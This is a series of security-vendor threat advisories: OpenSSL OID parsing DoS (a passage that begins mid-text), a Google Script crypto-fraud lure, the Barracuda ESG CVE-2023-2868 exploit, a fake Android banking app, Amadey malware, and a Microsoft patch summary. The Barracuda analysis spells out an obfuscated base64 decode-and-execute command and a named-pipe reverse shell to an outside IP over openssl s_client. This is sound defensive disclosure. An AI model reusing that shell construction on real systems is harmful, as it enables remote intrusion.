  OpenSSL library incorporates support for parsing ASN.1 encoded OBJECT IDENTIFIER in DER format. More specifically, it provides an API known as OBJ_obj2txt() for data parsing. This function commences decoding from the first byte, interpreted as the two initial sub-identifiers, as per Rule 1. Post this, the function scrutinizes each byte of the remaining encoded data in a while loop. The value will be directly regarded as the decimal sub-identifier if it’s less than 0x80 (128), aligning with Rule 2. If the value equals or exceeds 0x80, the function discards Bit 7, storing only the left 7 bits (Bits 6 – 0), and repeats this step in a for loop until a byte less than 0x80 is encountered. The function then concatenates all the lower 7 bits in these bytes and converts the bit stream into an integer. This integer’s decimal value will be the sub-identifier. Nevertheless, this function does not impose restrictions on the length of the encoded OBJECT IDENTIFIER data. Consequently, the decoding step could be extensively time-consuming if the concatenated value forms a large integer.

Triggering the Problem:

  • The target must be running a vulnerable version of the affected product.
  • The attacker must have the ability to delivery a malicious ASN.1 DER file to the target

Triggering Conditions:

  The vulnerability can be exploited if the attacker successfully delivers a malicious certificate or any other file in DER format to applications utilizing the OpenSSL library. The vulnerability is subsequently triggered upon the parsing of this malicious file, establishing a potential security risk for the system.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • FTP
    • HTTP
    • HTTPS
    • IMAP
    • NFS
    • POP3
    • SMB/CIFS
    • SMTP
    • ESMTP
    • SIPS

  Get Request:
  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS:19207 OpenSSL OBJ_obj2txt Function DoS

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Apply the vendor-provided patch to eliminate the vulnerability.
    • Filter attack traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Google script being abused for Cryptocurrency fraud

SonicWall Capture Labs Research team has discovered an ongoing instance of cryptocurrency fraud that utilizes legitimate Google services, specifically Google Script macros. Threat actors intentionally target these platforms because they are both convenient to use and malicious code can evade detection by anti-malware systems.

Google Script macros are primarily designed to enhance productivity and streamline workflows within Google services. However, threat actors are now exploiting them for fraudulent purposes, finding ways to execute malicious code within the context of legitimate Google applications.

In this case, a PDF file is being circulated, containing a malicious URL that was created using Google Script. Once the user interacts with this URL, they are redirected to the actual fraudulent website.

Fig: PDF File

 

Below shown the response to the malicious URL using Google Script Macro.

Fig: Fiddler capture of malicious Google Script Macro

 

When the URL in the PDF file opens it shows Google’s message that this application was created by another user not by Google when clicked on the webpage it redirects to office[.]proprogramvipt[.]top

Fig: Google script malicious URL

 

After redirection, On this deceptive webpage, user is confronted with a warning message indicating that their account is at risk of deletion due to inactivity. To add a sense of urgency, a countdown timer is displayed, suggesting that the account will be deleted imminently.

In order to prevent the account deletion and purportedly withdraw the funds (which, in reality, are non-existent), user is instructed to sign in.

Fig: Warning for account deletion

 

Upon signing in, user is presented with a prepopulated sign-in page that appears legitimate. The page is carefully designed to create an enticing welcome-back message, which includes displaying the user’s Bitcoin balance in both BTC and USD values. This serves as bait to lure user into continuing further with the process.

Fig: Sign-in & welcome message

 

To create an illusion of authenticity, various elements that mimic legitimate features commonly found on cryptocurrency platforms are presented. These elements include:

History: A fabricated transaction history is displayed, showcasing previous transactions to make the platform appear genuine.

User Chat: Fictitious comments and messages from fake users are shown, attempting to simulate user activity and engagement on the platform.

Settings: Users are provided with an option to collect bitcoins, along with the ability to change their password. This is aimed at giving the impression of user control and customization.

News: Fake news articles are presented, falsely claiming updates such as a switch to a new cryptocurrency system, the addition of PayPal payouts, or technical server-related updates. These news pieces aim to instill a sense of credibility and innovation.

All of these elements are carefully designed to create an atmosphere of legitimacy and trust, further deceiving users into believing that the fraudulent platform is genuine and reliable.

 

Fig: News, Settings, Chat & History

 

It shows the current balance in BTC & USD with a button to collect bitcoin bonuses.

 

Fig: Collect BTC Bonuses

 

After clicking the “Collect Bitcoin Bonuses” button it shows a progress bar as if mining is going on the system with fake transaction hashes.

Fig: Fake mining

 

Once the progress bar reaches 100% it shows collected BTC and a get paid button.

 

Fig: BTC collection

 

After clicking get paid it asks for the user’s personal details along with account/card details.

 

Fig: User’s details

 

After getting all the details shows forwarding the details to the manager and they have their own chatbot which says details are verified without any validation even if random input is given.

Fig: Chatbot

Then for currency exchange, it redirects to BTC pay & the user has to pay in bitcoin.

 

Fig: BTCPay

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: CryptoFraud.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

Indicators of Compromise (IOC):

671ea7c95223fc15b2dbe03bc55acc44d81f0f69c1a3686c9f8db174df3e2710

Barracuda ES Gateway Reverse Shell Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  The Barracuda Email Security Gateway is a comprehensive email security solution developed to safeguard businesses from a multitude of email threats such as spam, viruses, phishing, DoS attacks, and data leaks. It is available in physical and virtual forms and offers thorough inbound and outbound email filtering, data leak prevention, and email encryption. It also boasts advanced features like protection against sophisticated threats like ransomware and zero-day attacks. In addition, it employs an outbound filtering system to avert data loss and uphold the reputation of your email server’s IP address.

  The appliance form factor of the Barracuda Email Security Gateway pertains to its physical variant, a standalone device installable directly into an organization’s network infrastructure.

  A remote command injection vulnerability has been discovered in the Barracuda Email Security Gateway product, affecting versions 5.1.3.001 to 9.2.0.006. This vulnerability stems from an insufficient sanitization process of .tar files (tape archives).

  This vulnerability could be exploited by a remote, unauthenticated attacker by sending a specially crafted TAR file to the targeted device. A successful attack could result in a reverse shell against the targeted server, thus compromising its security.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2868.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.8 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  Inside the TAR file, you will see the following string:
  
  The script provided is a shell command that decodes a base64 encoded string and then executes the result. Here’s a detailed breakdown of what the command does:

  • abcdefg=: This sets the variable abcdefg to a base64 encoded string.
  • ee=ba: This sets the variable ee to the string ba.
  • G=s: This sets the variable G to the string s.
  • "ech"o $abcdefg|${ee}se64 -d|${G}h: This part of the command is using some obfuscation. If we substitute ee with ba and G with s, we get "ech"o $abcdefg | base64 -d | sh.
    1. "ech"o $abcdefg: This echoes the base64 encoded string stored in abcdefg.
    2. base64 -d: This decodes the base64 encoded string.
    3. sh: This executes the resulting decoded command string using sh.
  • wh66489.txt: This command doesn’t seem to have any context related to the rest of the script and it doesn’t appear to be a valid command by itself. If it was intended to redirect the output to a file named wh66489.txt, then it would require a > before the filename like this > wh66489.txt.

 If we decode the base64 string abcdefg using the command "ech"o $abcdefg | base64 -d, we get:

 This command is creating a reverse shell that connects to a specified host 107.148.223.196:443 over a secure SSL/TLS connection.

 The breakdown of the reverse shell commands:

  • setsid: This command is used to run a new session in Unix and Unix-like operating systems. This ensures that the command continues running even if the terminal is closed.
  • sh -c: The sh -c command is used to run a shell (sh) with a command string (-c option). Here, the string within the quotes is the command string that sh is going to execute.
  • mkfifo /tmp/p: The mkfifo command creates a named pipe with the name /tmp/p. Pipes are used to direct the output from one command as input to another. Named pipes, like /tmp/p, can be used by multiple processes for communication.
  • sh -i < /tmp/p 2>&1|openssl s_client -quiet -connect 107.148.223.196:443 > /tmp/p 2>/dev/null: This is a compound command.
    1. sh -i < /tmp/p 2>&1: The sh -i command starts an interactive shell. The < /tmp/p redirects the input of this shell from the named pipe we created earlier.
    2. The 2>&1 redirects standard error (2) to standard output (1).
    3. Therefore, both the error messages and standard output from the sh -i command are sent to the pipe /tmp/p.
    4. The | character pipes the output from the preceding command as the input to the next command.
    5. openssl s_client -quiet -connect 107.148.223.196:443: The openssl s_client command starts a SSL/TLS client that connects to an SSL/TLS server. The -quiet option suppresses most of the output. The -connect option specifies the host and port to connect to, here 107.148.223.196:443.
    6. > /tmp/p 2>/dev/null: This part is redirecting the standard output to the named pipe (/tmp/p) and discarding the standard error by directing it to /dev/null.
  • rm /tmp/p: Finally, after the connection is terminated, this command removes the named pipe /tmp/p.

 The overall purpose of this command is to create a reverse shell that connects to a specified host 107.148.223.196:443 over a secure SSL/TLS connection. The connection is kept alive even if the terminal is closed due to the setsid command.

Triggering the Problem:

  • The target system must have the Barracuda Email Security Gateway versions 5.1.3.001-9.2.0.006.
  • The attacker must have network connectivity to the affected ports.
  • The attacker must send malicious attachments designed to exploit CVE-2023-2868 to gain initial access.

Triggering Conditions:

  For emails targeting Barracuda Email Security Gateway middleboxes and transmitted over SMTP or ESMTP, it is crucial to attach files with the extension ".tar" in their filename. Alternatively, using other extensions such as ".jpg" or ".dat" is acceptable, as long as they contain valid ".tar" file content for exploitation.

  Note that ".tar" file attachments crafted as valid exploits have the potential to execute a reverse shell payload on certain ESG appliances during the email attachment screening process.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • SMTP
    • ESMTP
  Exploit chain related malware components will be installed over HTTP/HTTPs.

  Reverse Shell File Content:
  

SonicWall's, Capture Labs, provides protection against this threat:

  • GAV: 18479 CVE-2023-2868.A

  • GAV: 17928 Saltwater.A

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory #1
  Vendor Advisory #2

Minimal permissions are adequate for fraudulent Android financial applications

SonicWall Capture Labs Threat research team recently discovered a campaign requesting users to provide their card details on a fraudulent bank application under the pretense of claiming rewards points. Additionally, they persuade users to enable SMS-related permissions, the fraudulent application gains the capability to intercept and redirect One-Time Password (OTP) messages to the attackers’ server, giving them unauthorized access to the user’s banking credentials and potentially leading to fraudulent activities or financial loss.

The fraudulent app’s icon may closely resemble the original app’s icon in terms of color scheme, logo, and overall visual elements. This resemblance creates a false sense of trust and familiarity for unsuspecting users. They may not immediately recognize any visual discrepancies and may proceed with providing their card details without suspicion.

Fig1: Legitimate & malicious apps icon

Infection cycle:

The fraudulent apps utilize two crucial permissions.

  1. SMS permission: to read and identify incoming messages (2 Factor authentication for the bank).
  2. INTERNET permission: to establish an internet connection and send the collected card and SMS details to the attacker’s server.

After installation it proceeds to prompt the user to fill in their card details, enticing them with the promise of claiming rewards.

Fig2: Card details with random values

 

Fig3: Prompt for Card details

 

Fig4: Prompt for Card details

 

Fig5: Checks for SMS permission

 

Once the user shares their card details with the fraudulent app, it immediately initiates the process of transmitting this sensitive information to the attacker’s C&C server.

Fig6: Sharing card details with C&C server

 

Storing the user and card information in a local database located within the application system folder.

Fig7: Application system folder


Fig8: Storing user info in a local database

 

Read incoming messages on a device and save them in JSON format.

Fig9: Read incoming SMS

 

Fig10: Stores SMS info in a JSON format

 

It shares incoming message details with the C&C server.

Fig11: Sends SMS info to the C&C server

 

The file is detected by only a few security vendors on the popular threat intelligence sharing portal VirusTotal at the time of writing this blog, this indicates its spreading potential.

Fig12: VirusTotal image

 

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Indicators of Compromise (IOC):

 

01dad4cb5fd433b1138078d39d7ced11229d22971acc4ba71bb03eb09e5b702b

0901a1d1b25ed81a6100d5e9e4a8363e9a638e45ae4a418d80e78189c01510ec

14732a80ea580c54b88780c3346b95a58d1dad80e1ed60800018c76746caa421

17ccf51b19072810490319b20d5d337c9621405e443c73fa2ec96c8d04038d6c

1825679fb5840bd63002a28656a69bd6bac120cb3d0d2dee9c396b198b5db109

35eeaeea8d91cc999456d4f86330ea03beed3c53274c1525f541341b2a46bf4e

36c61e92e4f991339340d9b89a891c5c74ef043ee362df5173e8e50c617f1372

6e9f03a81be3b29be22f769b6a00e4f8ee5220884959d91c84906e163dbb592c

6ff0c6f8b54142b76d6acc3a1f7e2dc5fc9955bb92b4adea86e8d3e69c0f9399

8f088d49c70b1d64b3ab8df0b2e4e527d1bad8865cf609bc0801acfbf3b1bd15

9cf21cfb921658c85ec63c362bfb71c5137e56c93caeab9ec0b2798bcbeeea6f

cec60348cf2be5400b37597ba8903453f12aef5a936aabad85cce13320cc59ee

ddfe903d31c87f49c02fbb4e5b63351964e55c8ef12a8fa5500e5471236d10f2

e740a368bbfc74b32eddfe57282094100a66a7a11f31181a262c40914e9449dd

ec409e8f9bb9d19b786e3e0f99f863d97da8465b7b2569bbd88a83f4ec439880

f9d94528bdb34628c9169bc3770c8d087afd5793d47247eb84e7fa60ead17534

Amadey Malware Has Improved Its String Decoding Algorithm

OVERVIEW

SonicWall Capture Labs Research team recently observed a new variant of Amadey malware. Amadey is a botnet with main objective of stealing sensitive information and to inject additional payload by receiving the commands from command & control server. In this variant we observed that it has modified its string decoding algorithm.

In this blog post, we will discuss.

  • Introduction to Amadey malware.
  • Command & control server communication.
  • New string decoding algorithm.

 INTRODUCTION

Since Amadey’s initial discovery in October 2018, the Amadey botnet has been operational. Amadey is mostly propagated by exploit kits like RigEK and Fallout EK. Amadey version found in current sample is 3.83.

Fig 1: Amadey CnC Login Panel

C2 COMMUNICATION

Malware starts collecting victim’s system information and initiate communication with CnC server by sending collected information. Victim’s System Information includes compute name, username, operating system, domain name, installed anti-virus vendor, system architecture and admin privilege present or not.

In response to send request, CnC can send URL to download additional malware. In this variant, it is seen distributing Redline stealer malware. Amadey sends requests to download two data stealing plugins of names cred.dll & clip64.dll.

Fig 2: Downloads add-on Plugins

STRINGS OBFUSCATION

Malware stores all the used strings like CNC domain address, AV product names,  DLL file names, registry keys used for persistence, API names, URL parameters etc. Encoded strings are present in “.rdata” section of malware.

Fig 3: Some of Encoded Strings

HARD CODED KEY

Fig 4: Hardcoded Decryption key, Mutex name, Amadey ID

IMPROVED STRING ENCODING ALGORITHM

Fig 5: Pseudocode of string decoding algorithm

DECODED STRINGS

Fig 6: Some of Decoded strings

CONCLUSION

Amadey is botnet developed in C++ with main objective of stealing victims’ sensitive information. Amadey has capabilities to inject modules received from CnC which also makes it a downloader. Malware is using custom decoding algorithm to hide the strings.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: MalAgent.OLA_2 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

IOC’s:

C2

hxxp://77[.]91[.]68[.]30/DSC01491/foto124[.]exe

hxxp://77[.]91[.]68[.]30/DSC01491/fotod25[.]exe

hxxp://77[.]91[.]68[.]30/music/rock/Plugins/clip64[.]dll

hxxp://77[.]91[.]68[.]30/music/rock/Plugins/cred32[.]dll

 

SHA256

dcda87129c5d1687d208553663943bde1fb19ca3942fccf99da672d4f6cb3fea -> Amadey Malware

5cfeac2fad035a1a351abd2d5734dcb858583fdbdb9cf7f9383f5c809593fe96 -> foto125.exe

a2f989a5f3fcfef29366f7f469c39636dc3505da5ad44953cdd58829813c1d6f -> foto124.exe

340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87 -> cred64.dll

Microsoft Security Bulletin Coverage for June 2023

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-28310 Microsoft Exchange Server Remote Code Execution Vulnerability
ASPY 452 : Malformed-xml xml.MP_7

CVE-2023-29357 Microsoft SharePoint Server Elevation of Privilege Vulnerability
IPS 3917 : Microsoft SharePoint Server Elevation of Privilege (CVE-2023-29357)

CVE-2023-29358 Windows GDI Elevation of Privilege Vulnerability
ASPY 453 : Exploit-exe exe.MP_326

CVE-2023-29360 Windows TPM Device Driver Elevation of Privilege Vulnerability
ASPY 454 : Exploit-exe exe.MP_327

CVE-2023-29361 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
ASPY 455 : Exploit-exe exe.MP_328

CVE-2023-29371 Windows GDI Elevation of Privilege Vulnerability
ASPY 456 : Exploit-exe exe.MP_329

The following vulnerabilities do not have exploits in the wild :
CVE-2023-21565 Azure DevOps Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-21569 Azure DevOps Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-24895 .NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24896 Dynamics Finance and Operations Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-24897 .NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24936 .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-24937 Windows CryptoAPI Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-24938 Windows CryptoAPI Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-29326 .NET Framework Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29331 .NET, .NET Framework, and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-29337 NuGet Client Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29346 NTFS Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29351 Windows Group Policy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29352 Windows Remote Desktop Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-29353 Sysinternals Process Monitor for Windows Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-29355 DHCP Server Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-29359 GDI Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29362 Remote Desktop Client Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29363 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29364 Windows Authentication Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29365 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29366 Windows Geolocation Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29367 iSCSI Target WMI Provider Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29368 Windows Filtering Platform Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29369 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-29370 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29372 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29373 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32008 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32009 Windows Collaborative Translation Framework Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32010 Windows Bus Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32011 Windows iSCSI Discovery Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32012 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32013 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32014 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32015 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32016 Windows Installer Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32017 Microsoft PostScript Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32018 Windows Hello Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32019 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32020 Windows DNS Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32021 Windows SMB Witness Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32022 Windows Server Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32024 Microsoft Power Apps Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32029 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32030 .NET and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32031 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32032 .NET and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33126 .NET and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33128 .NET and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33129 Microsoft SharePoint Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33130 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33131 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33132 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33133 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33135 .NET and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33137 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33139 Visual Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-33140 Microsoft OneNote Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33141 Yet Another Reverse Proxy (YARP) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33142 Microsoft SharePoint Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33144 Visual Studio Code Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33146 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.